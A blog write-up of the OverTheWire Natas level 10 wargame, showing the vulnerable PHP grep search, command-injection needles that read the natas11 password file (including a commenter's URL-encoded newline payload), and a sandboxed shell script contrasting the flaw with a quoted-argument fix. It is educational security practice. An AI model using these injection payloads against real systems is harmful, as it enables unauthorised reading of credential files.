Monday, October 29, 2012

OvertheWire - Natas Wargame Level 10 Writeup

Level 10

Using the credentials obtained in the previous writeup, we can log in to Level 10, where we are presented with the following:


It appears as though the only difference between this challenge and Level 9 is that certain characters are filtered. Let's see the source to figure out which characters are affected:

<html>
<head><link rel="stylesheet" type="text/css" href="http://www.overthewire.org/wargames/natas/level.css"></head>
<body>
<h1>natas10</h1>
<div id="content">
For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>
Output:
<pre>
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
  $key = $_REQUEST["needle"];
}
if($key != "") {
  if(preg_match('/[;|&]/',$key)) {
    print "Input contains an illegal character!";
  } else {
    passthru("grep -i $key dictionary.txt");
  }
}
?>
</pre>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

The preg_match call rejects any needle containing a character from the class [;|&], i.e. ';', '|' and '&' (the pipe is a literal inside square brackets, not an alternation). So we can no longer terminate or chain the command with ';', '&&' or '|' as we did in the previous writeup. However, the needle is still interpolated unquoted into "grep -i $key dictionary.txt", so we control grep's argument list. grep accepts any number of file operands after the pattern, so what if we supply a pattern that matches every line, followed by the password file of the natas11 user as an additional file?

We can do so with the following needle:

.* /etc/natas_webpass/natas11 #

The resulting shell command is grep -i .* /etc/natas_webpass/natas11 # dictionary.txt. Everything from the '#' onwards is a shell comment, so the reference to dictionary.txt is discarded and grep searches the natas11 password file instead; .* matches any character zero or more times, so every line of that file is printed. One caveat: the pattern is unquoted, so the shell expands .* as a glob before grep runs. In the web root that matches '.', '..' and dotfiles such as .htaccess, so the first match becomes grep's pattern and the remaining matches are searched as extra files, which is why more than just the password shows up. Quoting the pattern as '.*' would keep it literal and limit the output to the password file. Let's see what happens:


Awesome. We can see that our command completed successfully, and we can see the contents of the password file at the bottom (in addition to the contents of what appears to be the .htaccess file for natas10). We can use this password to log in to the next level. More writeups to come.
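To make the mechanics concrete, here is an added example (not code from the original writeup) that rebuilds the natas10 bug in a throwaway directory: it mimics the PHP blacklist and the passthru() call with a POSIX sh function, runs the needle from above against constructed files, shows what the unquoted .* actually expands to, and then shows the one-argument fix. The dictionary, the .htaccess stand-in, the fake password value and the sandbox-relative path etc/natas_webpass/natas11 are all constructed here and are not the real challenge files.

```shell
#!/bin/sh
# Added example, not part of the original writeup or the Natas challenge code.
# Everything below (dictionary, dotfile, "password", paths) is constructed.
set -eu

SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
cd "$SANDBOX"
printf 'apple\nbanana\ncherry\n' > dictionary.txt
printf 'AuthType Basic\nAuthName "natas10"\n' > .htaccess   # constructed stand-in for the real dotfile
mkdir -p etc/natas_webpass
printf 'EXAMPLE_SECRET_FOR_NATAS11\n' > etc/natas_webpass/natas11   # constructed, not the real password

# Same check as the PHP preg_match('/[;|&]/'): returns 0 when the needle is allowed.
filter_allows() {
    ! printf '%s' "$1" | grep -q '[;|&]'
}

# Vulnerable: mirrors passthru("grep -i $key dictionary.txt"). The needle is
# spliced into a command string that /bin/sh re-parses, so globs, '#' comments
# and embedded newlines in it are interpreted by the shell, not by grep.
vulnerable_search() {
    filter_allows "$1" || { echo 'Input contains an illegal character!'; return 0; }
    sh -c "grep -i $1 dictionary.txt" </dev/null 2>/dev/null || true
}

# Fixed: the needle reaches the child shell as a positional parameter and is
# expanded inside double quotes, so it is always exactly one grep argument
# (the PHP equivalent is escapeshellarg($key)). '--' stops a needle such as
# '-r' from being parsed as a grep option.
fixed_search() {
    filter_allows "$1" || { echo 'Input contains an illegal character!'; return 0; }
    sh -c 'grep -i -- "$1" dictionary.txt' sh "$1" </dev/null 2>/dev/null || true
}

PAYLOAD='.* etc/natas_webpass/natas11 #'
echo "--- what the child shell turns the unquoted .* into in this directory:"
sh -c 'printf "%s " .*; echo'
# With dash/busybox sh the first match is '.', which as a regex matches every
# line, and .htaccess is searched as an extra file (the writeup's output).
# bash 5.2+ skips '.' and '..' by default, so there .htaccess itself would
# become the pattern; quoting the needle as '.*' removes that dependency.
echo "--- vulnerable, needle: $PAYLOAD"
vulnerable_search "$PAYLOAD"
echo "--- vulnerable, needle: '.*' etc/natas_webpass/natas11 #"
vulnerable_search "'.*' etc/natas_webpass/natas11 #"
echo "--- vulnerable, needle with an embedded newline (the blacklist does not catch it)"
vulnerable_search "$(printf 'x\ncat etc/natas_webpass/natas11')"
echo "--- fixed, needle: $PAYLOAD (nothing should follow)"
fixed_search "$PAYLOAD"
```

The blacklist only closes the three characters the author chose to block; the fixed version does not care which characters appear in the needle because the needle is never re-parsed as shell syntax. Denylisting shell metacharacters in front of an interpolated command string is not a fix, passing the value as a single argument is.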

- Jordan

4 comments:

  1. This comment has been removed by the author.

  2. I solved this one by sending %0Acat%20/etc/natas_webpass/natas11 as the needle param.
    cheers,

  3. Could you explain what the function of the '.' is in the command?
    Why does simply doing '* /etc/natas_webpass/natas11 #' display the website's source instead of search results?

    Replies
    1. I believe .* is the regex evaluated by grep. It means any character (the dot) 0 or more times (the star).